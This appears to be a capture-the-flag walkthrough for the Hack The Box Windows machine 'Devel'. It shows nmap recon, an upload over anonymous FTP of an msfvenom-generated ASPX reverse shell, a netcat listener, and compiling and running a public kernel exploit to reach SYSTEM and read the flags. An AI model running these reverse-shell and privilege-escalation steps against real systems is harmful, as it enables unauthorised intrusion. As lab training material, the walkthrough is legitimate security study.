Create a directory for machine on the Desktop and a directory containing the scans with nmap.
echo " devel.htb" >> /etc/hosts
mkdir htb/devel.htb
cd htb/devel.htb
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 devel.htb
PING devel.htb ( 56(84) bytes of data.
64 bytes from devel.htb ( icmp_seq=1 ttl=127 time=57.1 ms
64 bytes from devel.htb ( icmp_seq=2 ttl=127 time=53.6 ms
64 bytes from devel.htb ( icmp_seq=3 ttl=127 time=56.2 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~128 secs. this indicates that the target is a Windows system, while *nix systems usually have a TTL of 64 secs.
nmap --open -p0- -n -Pn -vvv --min-rate 5000 devel.htb -oG port_scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 15:32 EDT
Initiating SYN Stealth Scan at 15:32
Scanning devel.htb ( [65536 ports]
Discovered open port 80/tcp on
Discovered open port 21/tcp on
Completed SYN Stealth Scan at 15:32, 26.41s elapsed (65536 total ports)
Nmap scan report for devel.htb (
Host is up, received user-set (0.057s latency).
Scanned at 2023-07-24 15:32:23 EDT for 26s
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
21/tcp open ftp syn-ack ttl 127
80/tcp open http syn-ack ttl 127
It looks like there are 2 open ports on the machine: 21, 80.
Now, we need to search which services are running on open ports, in details on port 21:
nmap -p21,80 -n -Pn -vvv -sCV --min-rate 5000 devel.htb -oN open_ports
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 07-24-23 11:15AM 241062 40564.exe
| 03-18-17 02:06AM <DIR> aspnet_client
| 07-24-23 01:26AM 1442 cmdasp.aspx
| 07-24-23 12:36AM 2914 devel.aspx
| 07-24-23 01:04AM 2886 devel1.aspx
| 07-24-23 04:44PM 2917 devel2.aspx
| 07-24-23 02:11AM 2749 develshell.aspx
| 07-24-23 11:09AM 15966 fox.aspx
| 07-24-23 09:26AM 2906 hacked.aspx
| 03-17-17 05:37PM 689 iisstart.htm
| 07-24-23 07:16PM 0 killbill.aspx
| 07-24-23 07:21PM 2912 killbill1.aspx
| 07-24-23 12:17AM 2783 pwned.aspx
| 07-24-23 03:00PM 2923 rev.aspx
| 07-24-23 09:21PM 15969 shell.aspx
| 07-24-23 03:34PM 73802 virus.exe
| 07-24-23 12:34AM 112815 virus2.exe
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> help
Commands may be abbreviated. Commands are:
! cr ftp macdef msend prompt restart sunique
$ debug gate mdelete newer proxy rhelp system
account delete get mdir nlist put rmdir tenex
append dir glob mget nmap pwd rstatus throttle
ascii disconnect hash mkdir ntrans quit runique trace
bell edit help mls open quote send type
binary epsv idle mlsd page rate sendport umask
bye epsv4 image mlst passive rcvbuf set unset
case epsv6 lcd mode pdir recv site usage
cd exit less modtime pls reget size user
cdup features lpage more pmlsd remopts sndbuf verbose
chmod fget lpwd mput preserve rename status xferbuf
close form ls mreget progress reset struct ?
We can use put command to upload a single file.
We can try to put a file using ftp, in this case we use nmap result file (port_scan):
ftp> ls
229 Entering Extended Passive Mode (|||49220|)
125 Data connection already open; Transfer starting.
07-24-23 11:15AM 241062 40564.exe
03-18-17 02:06AM <DIR> aspnet_client
07-24-23 01:26AM 1442 cmdasp.aspx
07-24-23 12:36AM 2914 devel.aspx
07-24-23 01:04AM 2886 devel1.aspx
07-24-23 04:44PM 2917 devel2.aspx
07-24-23 02:11AM 2749 develshell.aspx
07-24-23 11:09AM 15966 fox.aspx
07-24-23 09:26AM 2906 hacked.aspx
03-17-17 05:37PM 689 iisstart.htm
07-24-23 07:16PM 0 killbill.aspx
07-24-23 07:21PM 2912 killbill1.aspx
07-24-23 10:57PM 464 port_scan
07-24-23 12:17AM 2783 pwned.aspx
07-24-23 03:00PM 2923 rev.aspx
07-24-23 09:21PM 15969 shell.aspx
07-24-23 03:34PM 73802 virus.exe
07-24-23 12:34AM 112815 virus2.exe
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
2.5 - Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
We launch msfconsole:
and we search a post/multi/recon exploit:
search post/multi/recon
Now, we can use msfvenom to generate an exploit to upload using ftp
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=444 -f aspx > exploit.aspx
Payload size: 327 bytes
Final size of aspx file: 2748 bytes
LHOST is local ip, while, LPORT is the port that we'll use to connect by netcat.
ftp> put script.aspx
local: script.aspx remote: script.aspx
229 Entering Extended Passive Mode (|||49224|)
125 Data connection already open; Transfer starting.
100% |**************************************************************| 2748 1.12 MiB/s --:-- ETA
226 Transfer complete.
2748 bytes sent in 00:00 (45.20 KiB/s)
Now we can launch netcat on port 444 and run script:
iis apppool\web
We're iis apppool\web user, the flag maybe is on the babiis user's desktop
We've not access to babibs' directory, we can try to find "user.txt" flag using while command in C:\ root.
where /r C:\ user.txt
Nothing to do! Now, we need to privilege escalation and access on bibis' dir.
We launch systeminfo command to know info about OS:
OS Version: 6.1.7600 N/A Build 7600
Searching on google we found this exploit for OS vs.
We download this script: "40564.c" and we compile it using mingw32
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32
Now we can re-open ftp in binary mode and put it (exploit.exe)
We can find exploit.exe file using where command and run it to escalate privilege!
where /r C:\ exploit.exe
nt authority\system
Starting to root folder (C:\) we can find quickly flags, using where command in recusive mode (/r):
where /r C:\ user.txt
and read user.txt flag using type command (equivalent to cat on *nix):
type C:\Users\babis\Desktop\user.txt
After that, we do the same thing for root.txt flag
where /r C:\ root.txt
type C:\Users\Administrator\Desktop\root.txt
